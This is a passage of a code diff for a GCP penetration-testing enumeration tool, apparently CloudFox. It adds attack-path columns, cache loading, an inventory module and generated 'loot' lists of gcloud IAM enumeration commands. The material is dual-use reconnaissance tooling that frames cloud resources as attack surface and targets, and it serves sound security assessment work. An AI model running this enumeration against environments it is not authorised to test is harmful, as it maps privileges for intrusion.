+104,16 @@ func (m *GKEModule) Execute(ctx context.Context, logger internal.Logger) { // Get attack path cache from context (populated by all-checks or attack path analysis) m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) + // If no context cache, try loading from disk cache + if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { + diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", + metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_GKE_MODULE_NAME) + m.AttackPathCache = diskCache + } + } + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_GKE_MODULE_NAME, m.processProject) // Get all clusters for stats @@ -331,11 +341,11 @@ func (m *GKEModule) writeFlatOutput(ctx context.Context, logger internal.Logger) func (m *GKEModule) buildTablesForProject(clusters []GKEService.ClusterInfo, nodePools []GKEService.NodePoolInfo) []internal.TableFile { tableFiles := []internal.TableFile{} - // Clusters table + // Clusters table - columns grouped by: identity, network/access, cluster-level security clusterHeader := []string{ - "Project Name", "Project ID", "Name", "Location", "Endpoint", "Status", "Version", - "Mode", "Private", "MasterAuth", "NetPolicy", "WorkloadID", "Shielded", "BinAuth", - "Release Channel", "ConfigConnector", + "Project", "Name", "Location", "Mode", "Status", "Version", "Release Channel", + "Endpoint", "Private", "Authorized CIDRs", + "WorkloadID", "NetPolicy", "BinAuth", } var clusterBody [][]string @@ -353,13 +363,15 @@ func (m *GKEModule) buildTablesForProject(clusters []GKEService.ClusterInfo, nod endpoint = "-" } + // Format authorized CIDRs + authorizedCIDRs := formatAuthorizedCIDRs(cluster) + clusterBody = append(clusterBody, []string{ - m.GetProjectName(cluster.ProjectID), cluster.ProjectID, cluster.Name, cluster.Location, - endpoint, cluster.Status, cluster.CurrentMasterVersion, clusterMode, - shared.BoolToYesNo(cluster.PrivateCluster), shared.BoolToYesNo(cluster.MasterAuthorizedOnly), - shared.BoolToYesNo(cluster.NetworkPolicy), shared.BoolToYesNo(cluster.WorkloadIdentity != ""), - shared.BoolToYesNo(cluster.ShieldedNodes), shared.BoolToYesNo(cluster.BinaryAuthorization), - releaseChannel, shared.BoolToYesNo(cluster.ConfigConnector), + m.GetProjectName(cluster.ProjectID), cluster.Name, cluster.Location, + clusterMode, cluster.Status, cluster.CurrentMasterVersion, releaseChannel, + endpoint, shared.BoolToYesNo(cluster.PrivateCluster), authorizedCIDRs, + shared.BoolToYesNo(cluster.WorkloadIdentity != ""), shared.BoolToYesNo(cluster.NetworkPolicy), + shared.BoolToYesNo(cluster.BinaryAuthorization), }) } @@ -371,10 +383,11 @@ func (m *GKEModule) buildTablesForProject(clusters []GKEService.ClusterInfo, nod }) } - // Node pools table + // Node pools table - node-level details including hardware security (like instances module) nodePoolHeader := []string{ - "Project Name", "Project ID", "Cluster", "Node Pool", "Machine Type", "Node Count", - "Service Account", "Attack Paths", "Cloud Platform Scope", "Auto Upgrade", "Secure Boot", "Preemptible", + "Project", "Cluster", "Node Pool", "Machine Type", "Node Count", + "Service Account", "SA Attack Paths", "SA Scopes", "SA Scope Summary", + "Auto Upgrade", "Secure Boot", "Integrity", "Preemptible", } var nodePoolBody [][]string @@ -385,7 +398,7 @@ func (m *GKEModule) buildTablesForProject(clusters []GKEService.ClusterInfo, nod } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "-" + attackPaths := "run --attack-paths" if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if saDisplay != "-" { attackPaths = m.AttackPathCache.GetAttackSummary(saDisplay) @@ -394,11 +407,21 @@ func (m *GKEModule) buildTablesForProject(clusters []GKEService.ClusterInfo, nod } } + // Format actual scopes for display + scopes := formatGKEScopes(np.OAuthScopes) + + // Get scope summary, default to "Unknown" if empty + scopeSummary := np.ScopeSummary + if scopeSummary == "" { + scopeSummary = "Unknown" + } + nodePoolBody = append(nodePoolBody, []string{ - m.GetProjectName(np.ProjectID), np.ProjectID, np.ClusterName, np.Name, + m.GetProjectName(np.ProjectID), np.ClusterName, np.Name, np.MachineType, fmt.Sprintf("%d", np.NodeCount), saDisplay, attackPaths, - shared.BoolToYesNo(np.HasCloudPlatformScope), shared.BoolToYesNo(np.AutoUpgrade), - shared.BoolToYesNo(np.SecureBoot), shared.BoolToYesNo(np.Preemptible || np.Spot), + scopes, scopeSummary, shared.BoolToYesNo(np.AutoUpgrade), + shared.BoolToYesNo(np.SecureBoot), shared.BoolToYesNo(np.IntegrityMonitoring), + shared.BoolToYesNo(np.Preemptible || np.Spot), }) } @@ -412,3 +435,42 @@ func (m *GKEModule) buildTablesForProject(clusters []GKEService.ClusterInfo, nod return tableFiles } + +// formatAuthorizedCIDRs formats the authorized CIDRs for display +func formatAuthorizedCIDRs(cluster GKEService.ClusterInfo) string { + if cluster.PrivateCluster { + return "Private endpoint" + } + if !cluster.MasterAuthorizedOnly { + return "0.0.0.0/0 (any)" + } + if len(cluster.MasterAuthorizedCIDRs) == 0 { + return "None configured" + } + // Check if 0.0.0.0/0 is in the list (effectively public) + for _, cidr := range cluster.MasterAuthorizedCIDRs { + if cidr == "0.0.0.0/0" { + return "0.0.0.0/0 (any)" + } + } + // Show all CIDRs + return strings.Join(cluster.MasterAuthorizedCIDRs, ", ") +} + +// formatGKEScopes formats OAuth scopes for display (extracts short names from URLs) +func formatGKEScopes(scopes []string) string { + if len(scopes) == 0 { + return "-" + } + + var shortScopes []string + for _, scope := range scopes { + // Extract the scope name from the URL + // e.g., "https://www.googleapis.com/auth/cloud-platform" -> "cloud-platform" + parts := strings.Split(scope, "/") + if len(parts) > 0 { + shortScopes = append(shortScopes, parts[len(parts)-1]) + } + } + return strings.Join(shortScopes, ", ") +} diff --git a/gcp/commands/iam.go b/gcp/commands/iam.go index 822baddd..abce5a8f 100644 --- a/gcp/commands/iam.go +++ b/gcp/commands/iam.go @@ -91,6 +91,7 @@ type IAMModule struct { Groups []IAMService.GroupInfo MFAStatus map[string]*IAMService.MFAStatus LootMap map[string]*internal.LootFile + AttackPathCache *gcpinternal.AttackPathCache mu sync.Mutex // Member to groups mapping (email -> list of group emails) @@ -147,6 +148,19 @@ func runGCPIAMCommand(cmd *cobra.Command, args []string) { // Module Execution // ------------------------------ func (m *IAMModule) Execute(ctx context.Context, logger internal.Logger) { + // Get attack path cache from context (populated by all-checks or attack path analysis) + m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) + + // If no context cache, try loading from disk cache + if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { + diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", + metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_IAM_MODULE_NAME) + m.AttackPathCache = diskCache + } + } + logger.InfoM("Enumerating IAM across organizations, folders, and projects...", globals.GCP_IAM_MODULE_NAME) // Use the enhanced IAM enumeration @@ -218,6 +232,10 @@ func (m *IAMModule) initializeLootFiles() { Name: "iam-commands", Contents: "# GCP IAM Commands\n# Generated by CloudFox\n\n", } + m.LootMap["iam-enumeration"] = &internal.LootFile{ + Name: "iam-enumeration", + Contents: "# GCP IAM Enumeration Commands\n# Generated by CloudFox\n# Use these commands to enumerate roles and permissions for identities\n\n", + } } func (m *IAMModule) generateLoot() { @@ -288,6 +306,140 @@ func (m *IAMModule) generateLoot() { extractRoleName(role.Name), role.ProjectID, ) } + + // Generate IAM enumeration commands + m.generateEnumerationLoot() +} + +func (m *IAMModule) generateEnumerationLoot() { + loot := m.LootMap["iam-enumeration"] + + // Add organization-level enumeration commands + for _, orgID := range m.OrgIDs { + orgName := m.OrgNames[orgID] + loot.Contents += fmt.Sprintf("# =====================================================\n") + loot.Contents += fmt.Sprintf("# Organization: %s (%s)\n", orgName, orgID) + loot.Contents += fmt.Sprintf("# =====================================================\n\n") + + loot.Contents += fmt.Sprintf("# List all IAM bindings for organization\n") + loot.Contents += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json\n\n", orgID) + + loot.Contents += fmt.Sprintf("# List all roles assigned at organization level\n") + loot.Contents += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json | jq -r '.bindings[].role' | sort -u\n\n", orgID) + + loot.Contents += fmt.Sprintf("# List all members with their roles at organization level\n") + loot.Contents += fmt.Sprintf("gcloud organizations get-iam-policy %s --format=json | jq -r '.bindings[] | \"\\(.role): \\(.members[])\"'\n\n", orgID) + } + + // Track unique identities for enumeration commands + identitiesSeen := make(map[string]bool) + type identityInfo struct { + email string + memberType string + roles []string + scopes []string + } + identities := make(map[string]*identityInfo) + + // Collect all unique identities and their roles/scopes + for _, sb := range m.ScopeBindings { + if sb.MemberEmail == "" { + continue + } + key := sb.MemberEmail + if !identitiesSeen[key] { + identitiesSeen[key] = true + identities[key] = &identityInfo{ + email: sb.MemberEmail, + memberType: sb.MemberType, + roles: []string{}, + scopes: []string{}, + } + } + identities[key].roles = append(identities[key].roles, sb.Role) + scopeKey := fmt.Sprintf("%s:%s", sb.ScopeType, sb.ScopeID) + // Check if scope already exists + found := false + for _, s := range identities[key].scopes { + if s == scopeKey { + found = true + break + } + } + if !found { + identities[key].scopes = append(identities[key].scopes, scopeKey) + } + } + + // Add project-level enumeration commands + for _, projectID := range m.ProjectIDs { + projectName := m.GetProjectName(projectID) + loot.Contents += fmt.Sprintf("# =====================================================\n") + loot.Contents += fmt.Sprintf("# Project: %s (%s)\n", projectName, projectID) + loot.Contents += fmt.Sprintf("# =====================================================\n\n") + + loot.Contents += fmt.Sprintf("# List all IAM bindings for project\n") + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json\n\n", projectID) + + loot.Contents += fmt.Sprintf("# List all roles assigned at project level\n") + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[].role' | sort -u\n\n", projectID) + + loot.Contents += fmt.Sprintf("# List all members with their roles at project level\n") + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | \"\\(.role): \\(.members[])\"'\n\n", projectID) + + loot.Contents += fmt.Sprintf("# Find all roles for a specific user (replace USER_EMAIL)\n") + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"USER_EMAIL\")) | .role'\n\n", projectID) + + loot.Contents += fmt.Sprintf("# Find all roles for a specific service account (replace SA_EMAIL)\n") + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"SA_EMAIL\")) | .role'\n\n", projectID) + + loot.Contents += fmt.Sprintf("# List all service accounts in project\n") + loot.Contents += fmt.Sprintf("gcloud iam service-accounts list --project=%s --format=json\n\n", projectID) + + loot.Contents += fmt.Sprintf("# List all custom roles in project\n") + loot.Contents += fmt.Sprintf("gcloud iam roles list --project=%s --format=json\n\n", projectID) + } + + // Add identity-specific enumeration commands + loot.Contents += fmt.Sprintf("# =====================================================\n") + loot.Contents += fmt.Sprintf("# Identity-Specific Enumeration Commands\n") + loot.Contents += fmt.Sprintf("# =====================================================\n\n") + + for email, info := range identities { + if info.memberType == "ServiceAccount" { + loot.Contents += fmt.Sprintf("# Service Account: %s\n", email) + // Extract project from SA email + saProject := "" + parts := strings.Split(email, "@") + if len(parts) == 2 { + saParts := strings.Split(parts[1], ".") + if len(saParts) >= 1 { + saProject = saParts[0] + } + } + if saProject != "" { + loot.Contents += fmt.Sprintf("# Find all roles for this service account across all projects\n") + for _, projectID := range m.ProjectIDs { + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"%s\")) | .role'\n", projectID, email) + } + loot.Contents += "\n" + } + } else if info.memberType == "User" { + loot.Contents += fmt.Sprintf("# User: %s\n", email) + loot.Contents += fmt.Sprintf("# Find all roles for this user across all projects\n") + for _, projectID := range m.ProjectIDs { + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"%s\")) | .role'\n", projectID, email) + } + loot.Contents += "\n" + } else if info.memberType == "Group" { + loot.Contents += fmt.Sprintf("# Group: %s\n", email) + loot.Contents += fmt.Sprintf("# Find all roles for this group across all projects\n") + for _, projectID := range m.ProjectIDs { + loot.Contents += fmt.Sprintf("gcloud projects get-iam-policy %s --format=json | jq -r '.bindings[] | select(.members[] | contains(\"%s\")) | .role'\n", projectID, email) + } + loot.Contents += "\n" + } + } } // extractRoleName extracts the role name from full path @@ -483,6 +635,7 @@ func (m *IAMModule) buildTables() []internal.TableFile { "MFA", "Groups", "Federated", + "SA Attack Paths", } var body [][]string @@ -530,6 +683,16 @@ func (m *IAMModule) buildTables() []internal.TableFile { // Check for federated identity federated := formatFederatedInfo(parseFederatedIdentity(sb.MemberEmail)) + // Check attack paths for service account principals + attackPaths := "-" + if sb.MemberType == "ServiceAccount" { + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { + attackPaths = m.AttackPathCache.GetAttackSummary(sb.MemberEmail) + } else { + attackPaths = "run --attack-paths" + } + } + body = append(body, []string{ sb.ScopeType, sb.ScopeID, @@ -544,6 +707,7 @@ func (m *IAMModule) buildTables() []internal.TableFile { mfa, groups, federated, + attackPaths, }) } @@ -565,6 +729,14 @@ func (m *IAMModule) buildTables() []internal.TableFile { groups = strings.Join(memberGroups, ", ") } + // Check attack paths for this service account + attackPaths := "-" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { + attackPaths = m.AttackPathCache.GetAttackSummary(sa.Email) + } else { + attackPaths = "run --attack-paths" + } + body = append(body, []string{ "project", sa.ProjectID, @@ -579,6 +751,7 @@ func (m *IAMModule) buildTables() []internal.TableFile { "N/A", groups, "-", // Service accounts are not federated identities + attackPaths, }) } @@ -603,6 +776,7 @@ func (m *IAMModule) buildTables() []internal.TableFile { "-", "-", "-", // Custom roles are not federated identities + "-", // Custom roles don't have attack paths }) } @@ -687,6 +861,7 @@ func (m *IAMModule) buildTablesForProject(projectID string) []internal.TableFile "MFA", "Groups", "Federated", + "SA Attack Paths", } var body [][]string @@ -734,6 +909,16 @@ func (m *IAMModule) buildTablesForProject(projectID string) []internal.TableFile federated := formatFederatedInfo(parseFederatedIdentity(sb.MemberEmail)) + // Check attack paths for service account principals + attackPaths := "-" + if sb.MemberType == "ServiceAccount" { + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { + attackPaths = m.AttackPathCache.GetAttackSummary(sb.MemberEmail) + } else { + attackPaths = "run --attack-paths" + } + } + body = append(body, []string{ sb.ScopeType, sb.ScopeID, @@ -748,6 +933,7 @@ func (m *IAMModule) buildTablesForProject(projectID string) []internal.TableFile mfa, groups, federated, + attackPaths, }) } @@ -772,6 +958,14 @@ func (m *IAMModule) buildTablesForProject(projectID string) []internal.TableFile groups = strings.Join(memberGroups, ", ") } + // Check attack paths for this service account + attackPaths := "-" + if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { + attackPaths = m.AttackPathCache.GetAttackSummary(sa.Email) + } else { + attackPaths = "run --attack-paths" + } + body = append(body, []string{ "project", sa.ProjectID, @@ -786,6 +980,7 @@ func (m *IAMModule) buildTablesForProject(projectID string) []internal.TableFile "N/A", groups, "-", + attackPaths, }) } @@ -814,6 +1009,7 @@ func (m *IAMModule) buildTablesForProject(projectID string) []internal.TableFile "-", "-", "-", + "-", // Custom roles don't have attack paths }) } diff --git a/gcp/commands/iap.go b/gcp/commands/iap.go index 9ad9a27a..31659489 100644 --- a/gcp/commands/iap.go +++ b/gcp/commands/iap.go @@ -143,14 +143,13 @@ func (m *IAPModule) writeOutput(ctx context.Context, logger internal.Logger) { func (m *IAPModule) getHeader() []string { return []string{ - "Project Name", - "Project ID", + "Project", "Name", "Region", "CIDRs", "FQDNs", - "Resource Role", - "Resource Principal", + "IAM Binding Role", + "IAM Binding Principal", } } @@ -170,7 +169,6 @@ func (m *IAPModule) groupsToTableBody(groups []iapservice.TunnelDestGroup) [][]s for _, binding := range group.IAMBindings { body = append(body, []string{ m.GetProjectName(group.ProjectID), - group.ProjectID, group.Name, group.Region, cidrs, @@ -182,7 +180,6 @@ func (m *IAPModule) groupsToTableBody(groups []iapservice.TunnelDestGroup) [][]s } else { body = append(body, []string{ m.GetProjectName(group.ProjectID), - group.ProjectID, group.Name, group.Region, cidrs, diff --git a/gcp/commands/instances.go b/gcp/commands/instances.go index 6cb684c3..4002e4d4 100644 --- a/gcp/commands/instances.go +++ b/gcp/commands/instances.go @@ -100,6 +100,16 @@ func (m *InstancesModule) Execute(ctx context.Context, logger internal.Logger) { // Get attack path cache from context (populated by all-checks or attack path analysis) m.AttackPathCache = gcpinternal.GetAttackPathCacheFromContext(ctx) + // If no context cache, try loading from disk cache + if m.AttackPathCache == nil || !m.AttackPathCache.IsPopulated() { + diskCache, metadata, err := gcpinternal.LoadAttackPathCacheFromFile(m.OutputDirectory, m.Account) + if err == nil && diskCache != nil && diskCache.IsPopulated() { + logger.InfoM(fmt.Sprintf("Using attack path cache from disk (created: %s)", + metadata.CreatedAt.Format("2006-01-02 15:04:05")), globals.GCP_INSTANCES_MODULE_NAME) + m.AttackPathCache = diskCache + } + } + // Run enumeration with concurrency m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_INSTANCES_MODULE_NAME, m.processProject) @@ -553,7 +563,7 @@ func (m *InstancesModule) getInstancesTableHeader() []string { "External IP", "Internal IP", "Service Account", - "Attack Paths", + "SA Attack Paths", "Scopes", "Default SA", "Broad Scopes", @@ -569,8 +579,8 @@ func (m *InstancesModule) getInstancesTableHeader() []string { "Confidential", "Encryption", "KMS Key", - "Resource Role", - "Resource Principal", + "IAM Binding Role", + "IAM Binding Principal", } } @@ -600,7 +610,7 @@ func (m *InstancesModule) instancesToTableBody(instances []ComputeEngineService. } // Check attack paths (privesc/exfil/lateral) for the service account - attackPaths := "-" + attackPaths := "run --attack-paths" if m.AttackPathCache != nil && m.AttackPathCache.IsPopulated() { if saEmail != "-" { attackPaths = m.AttackPathCache.GetAttackSummary(saEmail) diff --git a/gcp/commands/inventory.go b/gcp/commands/inventory.go new file mode 100644 index 00000000..708cf376 --- /dev/null +++ b/gcp/commands/inventory.go @@ -0,0 +1,1527 @@ +package commands + +import ( + "context" + "fmt" + "sort" + "strconv" + "strings" + "sync" + + apikeysservice "github.com/BishopFox/cloudfox/gcp/services/apikeysService" + artifactregistryservice "github.com/BishopFox/cloudfox/gcp/services/artifactRegistryService" + assetservice "github.com/BishopFox/cloudfox/gcp/services/assetService" + bigqueryservice "github.com/BishopFox/cloudfox/gcp/services/bigqueryService" + bigtableservice "github.com/BishopFox/cloudfox/gcp/services/bigtableService" + certmanagerservice "github.com/BishopFox/cloudfox/gcp/services/certManagerService" + cloudarmorservice "github.com/BishopFox/cloudfox/gcp/services/cloudArmorService" + cloudbuildservice "github.com/BishopFox/cloudfox/gcp/services/cloudbuildService" + cloudrunservice "github.com/BishopFox/cloudfox/gcp/services/cloudrunService" + cloudsqlservice "github.com/BishopFox/cloudfox/gcp/services/cloudsqlService" + cloudstorageservice "github.com/BishopFox/cloudfox/gcp/services/cloudStorageService" + composerservice "github.com/BishopFox/cloudfox/gcp/services/composerService" + computeengineservice "github.com/BishopFox/cloudfox/gcp/services/computeEngineService" + dataflowservice "github.com/BishopFox/cloudfox/gcp/services/dataflowService" + dataprocservice "github.com/BishopFox/cloudfox/gcp/services/dataprocService" + dnsservice "github.com/BishopFox/cloudfox/gcp/services/dnsService" + filestoreservice "github.com/BishopFox/cloudfox/gcp/services/filestoreService" + functionsservice "github.com/BishopFox/cloudfox/gcp/services/functionsService" + gkeservice "github.com/BishopFox/cloudfox/gcp/services/gkeService" + iamservice "github.com/BishopFox/cloudfox/gcp/services/iamService" + kmsservice "github.com/BishopFox/cloudfox/gcp/services/kmsService" + loggingservice "github.com/BishopFox/cloudfox/gcp/services/loggingService" + memorystoreservice "github.com/BishopFox/cloudfox/gcp/services/memorystoreService" + notebooksservice "github.com/BishopFox/cloudfox/gcp/services/notebooksService" + pubsubservice "github.com/BishopFox/cloudfox/gcp/services/pubsubService" + schedulerservice "github.com/BishopFox/cloudfox/gcp/services/schedulerService" + secretsservice "github.com/BishopFox/cloudfox/gcp/services/secretsService" + sourcereposservice "github.com/BishopFox/cloudfox/gcp/services/sourceReposService" + spannerservice "github.com/BishopFox/cloudfox/gcp/services/spannerService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + serviceusage "google.golang.org/api/serviceusage/v1" +) + +const GCP_INVENTORY_MODULE_NAME = "inventory" + +var GCPInventoryCommand = &cobra.Command{ + Use: GCP_INVENTORY_MODULE_NAME, + Aliases: []string{"inv", "resources"}, + Short: "Enumerate all GCP resources across projects", + Long: `Enumerate all GCP resources across projects and display counts by resource type and region. + +This module provides a comprehensive inventory of your GCP environment, showing: +- Resource counts by type (Compute instances, GKE clusters, Cloud Functions, etc.) +- Regional distribution of resources +- Total resource counts per project + +The output helps identify: +- Attack surface scope and breadth +- Resource distribution patterns +- High-value target areas (dense resource regions) + +Supported Resource Types: +- Compute: Instances, Disks, Snapshots, Images +- Containers: GKE Clusters, Cloud Run Services/Jobs +- Serverless: Cloud Functions, App Engine +- Storage: Buckets, Filestore, BigQuery Datasets +- Databases: Cloud SQL, Spanner, Bigtable, Memorystore +- Networking: VPCs, Subnets, Firewalls, Load Balancers, DNS Zones +- Security: Service Accounts, KMS Keys, Secrets, API Keys +- DevOps: Cloud Build Triggers, Source Repos, Artifact Registry +- Data: Pub/Sub Topics, Dataflow Jobs, Dataproc Clusters +- AI/ML: Notebooks, Composer Environments`, + Run: runGCPInventoryCommand, +} + +// ResourceCount tracks count of a resource type per region +type ResourceCount struct { + ResourceType string + Region string + Count int + ResourceIDs []string // For loot file +} + +// AssetTypeSummary holds Cloud Asset Inventory counts by type +type AssetTypeSummary struct { + AssetType string + Count int + Covered bool // Whether CloudFox has a dedicated module for this type +} + +// InventoryModule handles resource inventory enumeration +type InventoryModule struct { + gcpinternal.BaseGCPModule + + // Resource tracking (from dedicated enumeration) + resourceCounts map[string]map[string]int // resourceType -> region -> count + resourceIDs map[string]map[string][]string // resourceType -> region -> []resourceID + regions map[string]bool // Track all regions with resources + mu sync.Mutex + + // Asset Inventory tracking (complete coverage) + assetCounts map[string]map[string]int // projectID -> assetType -> count + assetAPIEnabled bool // Whether any project had Asset API enabled + assetAPIFailedProjs []string // Projects where Asset API failed + + // Service Usage tracking (fallback when Asset API not available) + enabledServices map[string][]string // projectID -> list of enabled services + + // Totals + totalByType map[string]int + totalByRegion map[string]int + grandTotal int + + // Asset totals + assetGrandTotal int +} + +// InventoryOutput implements CloudfoxOutput interface +type InventoryOutput struct { + Table []internal.TableFile + Loot []internal.LootFile +} + +func (o InventoryOutput) TableFiles() []internal.TableFile { return o.Table } +func (o InventoryOutput) LootFiles() []internal.LootFile { return o.Loot } + +func runGCPInventoryCommand(cmd *cobra.Command, args []string) { + cmdCtx, err := gcpinternal.InitializeCommandContext(cmd, GCP_INVENTORY_MODULE_NAME) + if err != nil { + return + } + + module := &InventoryModule{ + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + resourceCounts: make(map[string]map[string]int), + resourceIDs: make(map[string]map[string][]string), + regions: make(map[string]bool), + totalByType: make(map[string]int), + totalByRegion: make(map[string]int), + assetCounts: make(map[string]map[string]int), + enabledServices: make(map[string][]string), + } + + module.Execute(cmdCtx.Ctx, cmdCtx.Logger) +} + +func (m *InventoryModule) Execute(ctx context.Context, logger internal.Logger) { + logger.InfoM("Starting resource inventory enumeration...", GCP_INVENTORY_MODULE_NAME) + + // Initialize resource type maps + m.initializeResourceTypes() + + // First, get complete asset counts from Cloud Asset Inventory API + // This provides comprehensive coverage of ALL resources + logger.InfoM("Querying Cloud Asset Inventory for complete resource coverage...", GCP_INVENTORY_MODULE_NAME) + m.collectAssetInventory(ctx, logger) + + // If Asset Inventory API failed, try Service Usage API as a fallback + // This shows which services are enabled (indicates potential resources) + if !m.assetAPIEnabled { + logger.InfoM("Falling back to Service Usage API to identify enabled services...", GCP_INVENTORY_MODULE_NAME) + m.collectEnabledServices(ctx, logger) + } + + // Then run detailed enumeration for security-relevant resources + // This always runs as a backup and provides security metadata + logger.InfoM("Running detailed enumeration for security analysis...", GCP_INVENTORY_MODULE_NAME) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, GCP_INVENTORY_MODULE_NAME, m.processProject) + + // Calculate totals + m.calculateTotals() + + if m.grandTotal == 0 && m.assetGrandTotal == 0 && len(m.enabledServices) == 0 { + logger.InfoM("No resources found", GCP_INVENTORY_MODULE_NAME) + return + } + + // Show summary based on what data we got + if m.assetAPIEnabled { + logger.SuccessM(fmt.Sprintf("Cloud Asset Inventory: %d total resources across %d asset types", + m.assetGrandTotal, m.countAssetTypes()), GCP_INVENTORY_MODULE_NAME) + } else if len(m.enabledServices) > 0 { + totalServices := 0 + for _, services := range m.enabledServices { + totalServices += len(services) + } + logger.SuccessM(fmt.Sprintf("Service Usage API: %d enabled services detected (may contain resources CloudFox doesn't enumerate)", + totalServices), GCP_INVENTORY_MODULE_NAME) + } + logger.SuccessM(fmt.Sprintf("CloudFox enumeration: %d resources across %d types (with security metadata)", + m.grandTotal, len(m.totalByType)), GCP_INVENTORY_MODULE_NAME) + + // Write output + m.writeOutput(ctx, logger) +} + +// initializeResourceTypes sets up the resource type maps +func (m *InventoryModule) initializeResourceTypes() { + resourceTypes := []string{ + // Compute + "Compute Instances", + "Compute Disks", + "Compute Snapshots", + "Compute Images", + // Containers + "GKE Clusters", + "Cloud Run Services", + "Cloud Run Jobs", + // Serverless + "Cloud Functions", + "Composer Environments", + // Storage + "Cloud Storage Buckets", + "Filestore Instances", + "BigQuery Datasets", + // Databases + "Cloud SQL Instances", + "Spanner Instances", + "Bigtable Instances", + "Memorystore Redis", + // Networking + "DNS Zones", + // Security + "Service Accounts", + "KMS Key Rings", + "Secrets", + "API Keys", + // DevOps + "Cloud Build Triggers", + "Source Repositories", + "Artifact Registries", + // Data + "Pub/Sub Topics", + "Pub/Sub Subscriptions", + "Dataflow Jobs", + "Dataproc Clusters", + // AI/ML + "Notebook Instances", + // Scheduling + "Scheduler Jobs", + // Logging + "Log Sinks", + // Security Policies + "Cloud Armor Policies", + // Certificates + "SSL Certificates", + } + + for _, rt := range resourceTypes { + m.resourceCounts[rt] = make(map[string]int) + m.resourceIDs[rt] = make(map[string][]string) + } +} + +// processProject enumerates all resources in a single project +func (m *InventoryModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { + if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { + logger.InfoM(fmt.Sprintf("Enumerating resources in project: %s", projectID), GCP_INVENTORY_MODULE_NAME) + } + + var wg sync.WaitGroup + semaphore := make(chan struct{}, 10) // Limit concurrent API calls per project + + // Compute resources + wg.Add(1) + go m.enumComputeInstances(ctx, projectID, &wg, semaphore) + + // GKE + wg.Add(1) + go m.enumGKEClusters(ctx, projectID, &wg, semaphore) + + // Cloud Run + wg.Add(1) + go m.enumCloudRun(ctx, projectID, &wg, semaphore) + + // Cloud Functions + wg.Add(1) + go m.enumCloudFunctions(ctx, projectID, &wg, semaphore) + + // Storage + wg.Add(1) + go m.enumBuckets(ctx, projectID, &wg, semaphore) + + // BigQuery + wg.Add(1) + go m.enumBigQuery(ctx, projectID, &wg, semaphore) + + // Cloud SQL + wg.Add(1) + go m.enumCloudSQL(ctx, projectID, &wg, semaphore) + + // Spanner + wg.Add(1) + go m.enumSpanner(ctx, projectID, &wg, semaphore) + + // Bigtable + wg.Add(1) + go m.enumBigtable(ctx, projectID, &wg, semaphore) + + // Memorystore + wg.Add(1) + go m.enumMemorystore(ctx, projectID, &wg, semaphore) + + // Filestore + wg.Add(1) + go m.enumFilestore(ctx, projectID, &wg, semaphore) + + // Service Accounts + wg.Add(1) + go m.enumServiceAccounts(ctx, projectID, &wg, semaphore) + + // KMS + wg.Add(1) + go m.enumKMS(ctx, projectID, &wg, semaphore) + + // Secrets + wg.Add(1) + go m.enumSecrets(ctx, projectID, &wg, semaphore) + + // API Keys + wg.Add(1) + go m.enumAPIKeys(ctx, projectID, &wg, semaphore) + + // Pub/Sub + wg.Add(1) + go m.enumPubSub(ctx, projectID, &wg, semaphore) + + // DNS + wg.Add(1) + go m.enumDNS(ctx, projectID, &wg, semaphore) + + // Cloud Build + wg.Add(1) + go m.enumCloudBuild(ctx, projectID, &wg, semaphore) + + // Source Repos + wg.Add(1) + go m.enumSourceRepos(ctx, projectID, &wg, semaphore) + + // Artifact Registry + wg.Add(1) + go m.enumArtifactRegistry(ctx, projectID, &wg, semaphore) + + // Dataflow + wg.Add(1) + go m.enumDataflow(ctx, projectID, &wg, semaphore) + + // Dataproc + wg.Add(1) + go m.enumDataproc(ctx, projectID, &wg, semaphore) + + // Notebooks + wg.Add(1) + go m.enumNotebooks(ctx, projectID, &wg, semaphore) + + // Composer + wg.Add(1) + go m.enumComposer(ctx, projectID, &wg, semaphore) + + // Scheduler + wg.Add(1) + go m.enumScheduler(ctx, projectID, &wg, semaphore) + + // Logging Sinks + wg.Add(1) + go m.enumLoggingSinks(ctx, projectID, &wg, semaphore) + + // Cloud Armor + wg.Add(1) + go m.enumCloudArmor(ctx, projectID, &wg, semaphore) + + // SSL Certificates + wg.Add(1) + 